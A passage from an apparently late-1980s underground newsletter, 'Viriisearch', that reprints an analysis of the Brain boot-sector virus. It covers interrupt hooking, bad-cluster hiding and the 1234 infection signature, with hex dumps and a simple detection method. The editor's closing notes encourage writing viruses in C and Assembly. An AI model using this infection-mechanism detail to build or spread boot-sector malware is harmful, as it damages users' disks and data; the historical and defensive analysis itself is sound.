oppy used on the system.
6. The virus appears to be unstable. The actual code is some 4100 bytes but
less than half of it is actually executed. Two portions of the program
are neither called nor can many researchers determine under what circum-
stances they would be executed. Was the extra code inserted to confuse
any one who disassembled the program? Is there some what that either or
both uncalled parts are involved that has thus far been undiscovered?
7. The virus source code contains a counter. The counter is reset often and
it is difficult to determine it's purpose. Because the counter was not
mentioned in published reports about the Brain, "new" viruses appeared.
Some companies whose disks were attacked discovered the counter and de-
cided that they had a new virus. When similarities to the Brain were
found it was decided that the new viruses were hacker versions of the
original found at the University of Delaware. Whether there are hacker
versions or destruction was caused by the unstable character of the Brain
is a question. Certainly it is not difficult for an experienced program-
mer who has obtained a copy of the Brain to modify it's code.
Note 1: In the January 31, 1988, issue of The New York Times, the article
about computer viruses contained the following: "Buried within the
code of the virus discovered at the University of Delaware was an
apparent ransom demand: Computer users who discovered the virus were
told to send $2,000 to an address in Pakistan to obtain an immunity
program, according to Harold Highland....The Pakistani contact was
not identified." This statement was never made by me and Vin McLellan
and the author of The New York Times article admits that it was never
made. Somewhere in the copy preparation and/or editing, the copy was
altered. In our discussion, I noted that the names of the authors and
their addresses in Lahore, Pakistan, were found in the virus and that
there was even a copyright notice. Because of other writers use of the
database of newspaper articles about viruses, several picked this qu-
ote up and used it without any verification. It has appeared in seve-
ral major newspapers in the States as well as in newspapers and the
computer trade press abroad.
Note 2: This note is my own, and was not in the original article. I noticed
that the author of this article had said that other articles releas-
ed on the Brain virus had errors in them. I also noticed that his
article had an error in it, too. He said:
By that time the virus has already hidden itself in RAM memory. Using a
clean bootable disk to start the system will result in that disk becom-
ing infected. (See Note 2). The virus will then spread to any other fl-
oppy used on the system.
Now, this is not possible. If you do a "warm boot" the virus may be
able to survive and infect that clean bootable disk. BUT if you do
a "cold boot" and wait fifteen seconds before you turn the machine
back on, there is no possible way for the virus to infect that disk.
Once you shut the machine off, RAM is empty. NOTHING can possibly
survive in RAM after the machine has been shut off. Even if you did
do a warm boot, and the virus survived, just have that clean boot
disk write protected and the virus won't be able to infect it.
How The Virus Infects A Disk
-----------------------------
When a Brain infected disk is inserted into a system, the virus first copies
itself to the highest area in memory. It resets the memory size by altering
interrupt vector A2H so as to protect the RAM resident virus. It also resets
interrupt vector 13H to point to the virus code in high memory and resets
interrupt vector 6H (unused under existing versions of DOS) to point to the
original interrupt vector, 13H. After the normal boot process is continued
with the loading of both IBMIO.COM and IBMDOS.COM under PC-DOS or IO.SYS and
MSDOS.SYS under MS-DOS. The infected disk contains a message and part of the
virus code in the boot sector. The remainder of the code and a copy of the
original boot sector is contained in three clusters (six sectors) that the
virus has labeled "bad" in the FAT. Figure 1 shows a map of an infected disk
obtained by using Central Point Software's PC Tools Deluxe.
Figure 1:
-----------------------------------------------------------------------------
Entire Disk Mapped 80% free space
Track 1 1 2 2 3 3 3
Double Sided 0 5 0 5 0 5 0 5 9
Booooo.....+++++++++++++++++++++++++++++++
Side 0 Fooooo.....+++++++++++++++++++++++++++++++
Fooooo..X..+++++++++++++++++++++++++++++++
Doooooo.X..+++++++++++++++++++++++++++++++
-----------Doooooo.X..+++++++++++++++++++++++++++++++
Dooooo.....+++++++++++++++++++++++++++++++
Side 1 oooooo.....+++++++++++++++++++++++++++++++
oooooo.....+++++++++++++++++++++++++++++++
oooooo.....+++++++++++++++++++++++++++++++
Explanation Of Codes:
+ Available . Allocated
B Boot Record o Hidden
F File Alloc. Table r Read Only
D Directory X Bad Cluster
-----------------------------------------------------------------------------
With the virus in upper RAM it is not possible to read the infected boot
sector. If an attempt is made to read the boot sector, the Brain re-directs
the request to read the original boot sector that is stored in one of the
bad sectors. The only way tp read the Brain message contained in the boot
sector, is to boot a system with a non-infected disk, preferably with a write
protect tab. Replace the boot disk with a write protected version of PC Tools
and place an infected disk in drive B. Figure 2 shows the embedded message by
using PC Tools to read the infected disk's boot sector.
Figure 2:
-----------------------------------------------------------------------------
Displacement -----------------HEX Values-------------------- ASCII Value
0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F Welcome to
0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 the Dungeon
0048 (0030) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0064 (0040) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0080 (0050) 20 28 63 29 20 31 39 38 36 20 42 61 73 69 74 20 (C) 1986 Basit
0096 (0060) 26 20 41 6D 6A 61 64 20 28 70 76 74 29 20 4C 74 & Amjad (pvt) Lt
0112 (0070) 64 2E 20 20 20 20 20 20 20 20 20 20 20 20 20 20 d
0128 (0080) 20 42 52 41 49 4E 20 43 4F 4D 50 55 54 45 52 20 BRAIN COMPUTER
0144 (0090) 53 45 52 56 49 43 45 53 2E 2E 37 33 30 20 4E 49 SERVICES 730 NI
0160 (00A0) 54 41 4D 20 42 4C 4F 43 4B 20 41 4C 4C 41 4D 41 ZAM BLOCK ALLAMA
0176 (00B0) 20 49 51 42 41 4C 20 54 4F 57 4E 20 20 20 20 20 IGBAL TOWN
0192 (00C0) 20 20 20 20 20 20 20 20 20 20 20 4C 41 48 4F 52 LAHOR
0208 (00D0) 45 2D 50 41 4B 49 53 54 41 4E 2E 2E 50 48 4F 4E E-PAKISTAN PHON
0224 (00E0) 45 20 3A 34 33 30 37 39 31 2C 34 34 33 32 34 38 E 430791.443248
0240 (00F0) 2C 32 38 30 35 33 30 2E 20 20 20 20 20 20 20 20 .280530
0256 (0100) 20 20 42 65 77 61 72 65 20 6F 66 20 74 68 69 73 Beware of this
0272 (0110) 20 56 49 52 55 53 2E 2E 2E 2E 2E 43 6F 6E 74 61 VIRUS.....Conta
0288 (0120) 63 74 20 75 73 20 66 6F 72 20 76 61 63 63 69 6E ct us for vaccin
0304 (0130) 61 74 69 6F 6E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E ation.......
-----------------------------------------------------------------------------
The virus, residing in high memory, interrupts and disk READ request. If that
request is not for the boot sector or non-floppy drive, the virus reads the
boot sector of the disk. It examines the 4th and 5th bytes for "1234" that are
stored as 34 12, the signature of the Brain. If that signature is not present
on the floppy disk, the virus infects the disk then proceeds with the READ
command. If the disk is already infected, the virus does not re-infect the
disk but instead continues with the READ. Also if the disk is write protected,
the infection will be terminated. Figure 3 is a comparison of the initial po-
rtion of a good and an infected boot sector.
Figure 3:
-----------------------------------------------------------------------------
GOOD Boot Sector:
Displacement -----------------HEX Values--------------------
0000 (0000) EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00
0016 (0010) 02 70 00 D0 02 FD 02 00 09 00 02 00 00 00 00 00
0032 (0020) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
BAD Boot Sector:
Displacement -----------------HEX Values--------------------
0000 (0000) FA E9 4A 01 34 12 01 02 27 00 01 00 00 00 00 20
0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F
0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20
-----------------------------------------------------------------------------
Normally the virus, in its attempt to infect a disk, will search for three
consecutive clusters it can mark as "bad". If there are no blank clusters, the
virus will not infect the disk. However, if there is only one blank cluster
and it is neither of the last two clusters on the disk, the virus will select
the one blank cluster and overwrite the next two clusters and mark all three
as bad. If the overwritten material is part of a file, that file no longer can
be executed if it is a program, or read if it is a data file. This is one way
in which a user might learn that a disk has been infected.
Poor Man's Filter
-----------------
In our laboratory testing we found a simple, inexpensive method to protect a
disk from becoming infected by the Brain virus by checking if the virus is in
high memory. It is possible to prepare a test disk by following these simple
steps.
1. Format a floppy disk with or without a system.
2. Use DEBUG.COM or PC Tools to edit the boot sector. The first line of the
boot sector appears as:
EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00
-----
3. Since the Brain examines the fifth and sixth bytes for its signature,
change those bytes to the virus' signature, 1234. Below is an altered
first line of a boot sector:
EB 34 90 49 34 12 20 20 33 2E 32 00 02 02 01 00
-----
Place this altered test disk in drive B and after the system prompt, A>,
type: DIR B: to obtain a directory of the test disk. If the system is infected
by the Brain virus, the following message will appear on the screen:
Not ready, error reading Drive B Abort, Retry, Ignore?
The disk with the altered boot sector will work only on a non-infected system.
*****************************************************************************
The Alvi brothers, Basit and Amjad, sell compatible PCs in their store in
Lebore, Pakistan. When contacted by a reporter for "The Chronicle of Higher
Education," the 19-year old Basit Alvi admitted writing the virus and placing
it on a disk in 1986 "for fun." He reportedly gave a copy of the virus prog-
ram to a friend, another student. However, both brothers were at a loss in
explaining how the virus emigrated to the States.
*****************************************************************************
Final Notes:
------------
Thanks to Midnight Cowboy for writing those articles and showing interest in
the newsletter. Sorry I did not include them but I came to the conclusion
that there is not much use for batch file virii when there are languages such
as C and Assembly. I do appreciate the effort, though.
Someone was SUPPOSED to write me a article for the Sample Source Code Dept.
on Pascal virii, but they never did it for me, just wanted to say thanks to
that person.
I got some bad feedback on my last issue of Viriisearch, and needless to say
I didn't like it too much. This person didn't like the fact that I had gone
over the C source code to ATTRB as much as I did. Well, I decided to go over
the source code really well because ATTRB is a well written program, as well
as a simple program, so I figured it would make you non C programmers inter-
ested in C and for you beginner C programmers, it would make you into a better
C programmer. What I covered on ATTRB last issue took me quite a while to
learn on my own and the knowledge is there for the taking. If you didn't like
it because you didn't understand it, I suggest you start learning C or Assem-
bly because that is, most likely, the only programming languages you will find
in this newsletter. And what does an attributes program have to do with virii?
Well, a lot of virii do have to change attributes on files and there was a
very well written, tight program to do it, in the last issue.
Speaking of feedback, the more the better. Starting in the next issue, #4, I
will be featuring reader's feedback, which I will reply to. Provided I get
enough feedback.
I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated
entirely to computer virii.
Until Next Time......Be Careful!!!
* Criminal Minded <tm> *
-----------------------------------------------------------------------------